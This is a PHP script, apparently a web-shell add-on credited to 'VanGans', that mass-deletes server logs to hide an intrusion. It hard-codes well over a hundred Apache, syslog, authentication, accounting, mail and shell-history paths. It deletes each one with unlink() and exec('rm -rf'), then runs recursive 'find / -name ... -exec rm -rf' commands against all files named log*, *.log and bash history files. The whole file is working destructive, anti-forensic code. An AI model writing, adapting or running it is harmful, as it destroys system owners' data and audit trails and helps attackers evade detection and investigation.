<?php
error_reporting(0);
/* Mass Delete Logs By VanGans */
$logs_list = array(
        '/usr/local/apache/domlogs/jdihgresik/',
        'access-logs',
        'logs',
        '/etc/httpd/logs/access.log' ,
        '/etc/httpd/logs/error.log'  ,
        '/etc/httpd/logs/access_log'  ,
        '/etc/httpd/logs/error_log'  ,
        '/usr/local/apache/logs/access_log'  ,
        '/usr/local/apache/logs/error_log'  ,
        '/usr/local/apache/logs/error.log'  ,
        '/var/log/apache/access_log'  ,
        '/var/log/apache/error_log'  ,
        '/var/log/apache/access.log'  ,
        '/var/log/apache/error.log'  ,
        '/var/log/access_log'  ,
        '/var/log/error_log'  ,
        '/var/www/logs/error.log'  ,
        '/var/www/logs/access.log'  ,
        '/var/www/logs/error_log'  ,
        '/var/www/logs/access_log',
        '/var/www/log/access_log',
        '/var/www/log/error_log',
        '/usr/local/etc/httpd/logs/access_log',
        '/usr/local/etc/httpd/logs/error_log',
        '/var/log/apache/access.log',
        '/var/log/apache/error.log',
        '/var/log/apache-ssl/error.log',
        '/var/log/apache-ssl/access.log',
        '/var/log/httpd/access_log',
        '/var/log/httpd/error_log',
        '/var/apache/logs/access_log',
        '/var/apache/logs/error_log',
        '/opt/lampp/logs/error_log',
        '/opt/lampp/logs/access_log',
        '/var/log/httpd/access_log',
        '/var/log/httpd/error_log',
        '/var/adm/SYSLOG',
        '/var/adm/sulog', 
        '/var/adm/utmp', 
        '/var/adm/utmpx',
        '/var/adm/wtmp', 
        '/var/adm/wtmpx', 
        '/var/adm/lastlog/',
        '/usr/spool/lp/log', 
        '/var/adm/lp/lp-errs', 
        '/usr/lib/cron/log',
        '/var/adm/loginlog', 
        '/var/adm/pacct', 
        '/var/adm/dtmp',
        '/var/adm/acct/sum/loginlog', 
        'var/adm/X0msgs', 
        '/var/adm/crash/vmcore',
        '/var/adm/crash/unix',
        '/var/adm/pacct',
'/var/adm/wtmp',
'/var/adm/dtmp',
'/var/adm/qacct',
'/var/adm/sulog',
'/var/adm/ras/errlog',
'/var/adm/ras/bootlog',
'/var/adm/cron/log','/etc/utmp','/etc/security/lastlog',
'/etc/security/failedlogin','usr/spool/mqueue/syslog',
'/var/adm/messages',
'/var/adm/aculogs',
'/var/adm/aculog',
'/var/adm/sulog',
'/var/adm/vold.log',
'/var/adm/wtmp',
'/var/adm/wtmpx',
'/var/adm/utmp','/var/adm/utmpx',
'/var/adm/log/asppp.log',
'/var/log/syslog',
'/var/log/POPlog',
'/var/log/authlog',
'/var/adm/pacct',
'/var/lp/logs/lpsched',
'/var/lp/logs/requests',
'/var/cron/logs',
'/var/saf/_log',
'/var/saf/port/log',
'/var/log/lastlog',
'/var/log/telnetd',
'/var/run/utmp',
'/var/log/secure',
'/root/.ksh_history',
'/root/.bash_history',
'/root/.bash_logut',
'/var/log/wtmp',
'/etc/wtmp',
'/var/run/utmp',
'/etc/utmp',
'/var/log',
'/var/adm',
'/var/apache/log',
'/var/apache/logs',
'/usr/local/apache/logs',
'/usr/local/apache/logs',
'/var/log/acct',
'/var/log/xferlog',
'/var/log/messages/',
'/var/log/proftpd/xferlog.legacy',
'/var/log/proftpd.xferlog',
'/var/log/proftpd.access_log',
'/var/log/httpd/error_log',
'/var/log/httpsd/ssl_log',
'/var/log/httpsd/ssl.access_log',
'/etc/mail/access',
'/var/log/qmail',
'/var/log/smtpd',
'/var/log/samba',
'/var/log/samba.log.%m',
'/var/lock/samba',
'/root/.Xauthority',
'/var/log/poplog',
'/var/log/news.all',
'/var/log/spooler',
'/var/log/news',
'/var/log/news/news',
'/var/log/news/news.all',
'/var/log/news/news.crit',
'/var/log/news/news.err',
'/var/log/news/news.notice',
'/var/log/news/suck.err',
'/var/log/news/suck.notice',
'/var/spool/tmp',
'/var/spool/errors',
'/var/spool/logs',
'/var/spool/locks',
'/usr/local/www/logs/thttpd_log',
'/var/log/thttpd_log',
'/var/log/ncftpd/misclog.txt',
'/var/log/nctfpd.errs',
'/var/log/auth',
'/var/log',
'/var/adm',
'/var/apache/log'
);
$returnValue = explode('public_html',getcwd());
$base_dirs = $returnValue[0];
$dmain = $_SERVER['SERVER_NAME'];
$arr_logs = array(
        ''.$base_dirs.'usr/local/apache/domlogs/jdihgresik/'.$dmain.'',
        ''.$base_dirs.'access-logs/'.$dmain.'',
        ''.$base_dirs.'logs/'.$dmain.'',
        ''.$base_dirs.'logs/',
        ''.$base_dirs.'access-logs/',
        ''.$base_dirs.'etc/httpd/logs/access.log' ,
        ''.$base_dirs.'etc/httpd/logs/error.log'  ,
        ''.$base_dirs.'etc/httpd/logs/access_log'  ,
        ''.$base_dirs.'etc/httpd/logs/error_log'  ,
        ''.$base_dirs.'usr/local/apache/logs/access_log'  ,
        ''.$base_dirs.'usr/local/apache/logs/error_log'  ,
        ''.$base_dirs.'usr/local/apache/logs/error.log'  ,
        ''.$base_dirs.'var/log/apache/access_log'  ,
        ''.$base_dirs.'var/log/apache/error_log'  ,
        ''.$base_dirs.'var/log/apache/access.log'  ,
        ''.$base_dirs.'var/log/apache/error.log'  ,
        ''.$base_dirs.'var/log/access_log'  ,
        ''.$base_dirs.'var/log/error_log'  ,
        ''.$base_dirs.'var/www/logs/error.log'  ,
        ''.$base_dirs.'var/www/logs/access.log'  ,
        ''.$base_dirs.'var/www/logs/error_log'  ,
        ''.$base_dirs.'var/www/logs/access_log',
        ''.$base_dirs.'var/www/log/access_log',
        ''.$base_dirs.'var/www/log/error_log',
        ''.$base_dirs.'usr/local/etc/httpd/logs/access_log',
        ''.$base_dirs.'usr/local/etc/httpd/logs/error_log',
        ''.$base_dirs.'var/log/apache/access.log',
        ''.$base_dirs.'var/log/apache/error.log',
        ''.$base_dirs.'var/log/apache-ssl/error.log',
        ''.$base_dirs.'var/log/apache-ssl/access.log',
        ''.$base_dirs.'var/log/httpd/access_log',
        ''.$base_dirs.'var/log/httpd/error_log',
        ''.$base_dirs.'var/apache/logs/access_log',
        ''.$base_dirs.'var/apache/logs/error_log',
        ''.$base_dirs.'opt/lampp/logs/error_log',
        ''.$base_dirs.'opt/lampp/logs/access_log',
        ''.$base_dirs.'var/log/httpd/access_log',
        ''.$base_dirs.'var/log/httpd/error_log',
        ''.$base_dirs.'var/adm/SYSLOG',
        ''.$base_dirs.'var/adm/sulog', 
        ''.$base_dirs.'var/adm/utmp', 
        ''.$base_dirs.'var/adm/utmpx',
        ''.$base_dirs.'var/adm/wtmp', 
        ''.$base_dirs.'var/adm/wtmpx', 
        ''.$base_dirs.'var/adm/lastlog/',
        ''.$base_dirs.'usr/spool/lp/log', 
        ''.$base_dirs.'var/adm/lp/lp-errs', 
        ''.$base_dirs.'usr/lib/cron/log',
        ''.$base_dirs.'var/adm/loginlog', 
        ''.$base_dirs.'var/adm/pacct', 
        ''.$base_dirs.'var/adm/dtmp',
        ''.$base_dirs.'var/adm/acct/sum/loginlog', 
        ''.$base_dirs.'var/adm/X0msgs', 
        ''.$base_dirs.'var/adm/crash/vmcore',
        ''.$base_dirs.'var/adm/crash/unix',
        ''.$base_dirs.'var/adm/pacct',
''.$base_dirs.'var/adm/wtmp',
''.$base_dirs.'var/adm/dtmp',
''.$base_dirs.'var/adm/qacct',
''.$base_dirs.'var/adm/sulog',
''.$base_dirs.'var/adm/ras/errlog',
''.$base_dirs.'var/adm/ras/bootlog',
''.$base_dirs.'var/adm/cron/log',
''.$base_dirs.'etc/utmp',
''.$base_dirs.'etc/security/lastlog',
''.$base_dirs.'etc/security/failedlogin',
''.$base_dirs.'usr/spool/mqueue/syslog',
''.$base_dirs.'var/adm/messages',
''.$base_dirs.'var/adm/aculogs',
''.$base_dirs.'var/adm/aculog',
''.$base_dirs.'var/adm/sulog',
''.$base_dirs.'var/adm/vold.log',
''.$base_dirs.'var/adm/wtmp',
''.$base_dirs.'var/adm/wtmpx',
''.$base_dirs.'var/adm/utmp',
''.$base_dirs.'var/adm/utmpx',
''.$base_dirs.'var/adm/log/asppp.log',
''.$base_dirs.'var/log/syslog',
''.$base_dirs.'var/log/POPlog',
''.$base_dirs.'var/log/authlog',
''.$base_dirs.'var/adm/pacct',
''.$base_dirs.'var/lp/logs/lpsched',
''.$base_dirs.'var/lp/logs/requests',
''.$base_dirs.'var/cron/logs',
''.$base_dirs.'var/saf/_log',
''.$base_dirs.'var/saf/port/log',
''.$base_dirs.'var/log/lastlog',
''.$base_dirs.'var/log/telnetd',
''.$base_dirs.'var/run/utmp',
''.$base_dirs.'var/log/secure',
''.$base_dirs.'root/.ksh_history',
''.$base_dirs.'root/.bash_history',
''.$base_dirs.'root/.bash_logut',
''.$base_dirs.'var/log/wtmp',
''.$base_dirs.'etc/wtmp',
''.$base_dirs.'var/run/utmp',
''.$base_dirs.'etc/utmp',
''.$base_dirs.'var/log',
''.$base_dirs.'var/adm',
''.$base_dirs.'var/apache/log',
''.$base_dirs.'var/apache/logs',
''.$base_dirs.'usr/local/apache/logs',
''.$base_dirs.'usr/local/apache/logs',
''.$base_dirs.'var/log/acct',
''.$base_dirs.'var/log/xferlog',
''.$base_dirs.'var/log/messages/',
''.$base_dirs.'var/log/proftpd/xferlog.legacy',
''.$base_dirs.'var/log/proftpd.xferlog',
''.$base_dirs.'var/log/proftpd.access_log',
''.$base_dirs.'var/log/httpd/error_log',
''.$base_dirs.'var/log/httpsd/ssl_log',
''.$base_dirs.'var/log/httpsd/ssl.access_log',
''.$base_dirs.'etc/mail/access',
''.$base_dirs.'var/log/qmail',
''.$base_dirs.'var/log/smtpd',
''.$base_dirs.'var/log/samba',
''.$base_dirs.'var/log/samba.log.%m',
''.$base_dirs.'var/lock/samba',
''.$base_dirs.'root/.Xauthority',
''.$base_dirs.'var/log/poplog',
''.$base_dirs.'var/log/news.all',
''.$base_dirs.'var/log/spooler',
''.$base_dirs.'var/log/news',
''.$base_dirs.'var/log/news/news',
''.$base_dirs.'var/log/news/news.all',
''.$base_dirs.'var/log/news/news.crit',
''.$base_dirs.'var/log/news/news.err',
''.$base_dirs.'var/log/news/news.notice',
''.$base_dirs.'var/log/news/suck.err',
''.$base_dirs.'var/log/news/suck.notice',
''.$base_dirs.'var/spool/tmp',
''.$base_dirs.'var/spool/errors',
''.$base_dirs.'var/spool/logs',
''.$base_dirs.'var/spool/locks',
''.$base_dirs.'usr/local/www/logs/thttpd_log',
''.$base_dirs.'var/log/thttpd_log',
''.$base_dirs.'var/log/ncftpd/misclog.txt',
''.$base_dirs.'var/log/nctfpd.errs',
''.$base_dirs.'var/log/auth',
''.$base_dirs.'var/log',
''.$base_dirs.'var/adm',
''.$base_dirs.'var/apache/log'
);
$logs_cmd = array(
        'find / -name .bash_history -exec rm -rf {} \;' ,
        'find / -name .bash_logout -exec rm -rf {} \;',
        'find / -name log* -exec rm -rf {} \;',
        'find / -name *.log -exec rm -rf {} \;',
        'find / -name .bash_logout -exec rm -rf {}',
        'find / -name log* -exec rm -rf {}',
        'find / -name *.log -exec rm -rf {}',
        'find / -name .bash_history -exec rm -rf {}',
);

foreach ($logs_list as $key => $value) {
        if(unlink($value)){
                echo "shell:~ unlink <font color=greenyellow>$value</font><br>";
        }else{
                echo "shell:~ unlink <font color=red>$value</font><br>";
        }
        if(exec("rm -rf $value")){
                echo "shell:~ rm -rf <font color=greenyellow>$value</font><br>";
        }else{
                echo "shell:~ rm -rf <font color=red>$value</font><br>";
        }
foreach ($arr_logs as $key => $values) {
        if(unlink($values)){
                echo "shell:~ unlink <font color=greenyellow>$values</font><br>";
        }else{
                echo "shell:~ unlink <font color=red>$values</font><br>";
        }
        if(exec("rm -rf $values")){
                echo "shell:~ rm -rf <font color=greenyellow>$values</font><br>";
        }else{
                echo "shell:~ rm -rf <font color=red>$values</font><br>";
        }
}
foreach ($logs_cmd as $key => $value_cmd) {
        if(exec("$value_cmd")){
                echo "shell:~ <font color=greenyellow>$value_cmd</font>";
        }else{
                echo "shell:~ rm -rf <font color=red>$value_cmd</font>";
        }
    flush();
    ob_flush();
}
   flush();
    ob_flush();
}


?>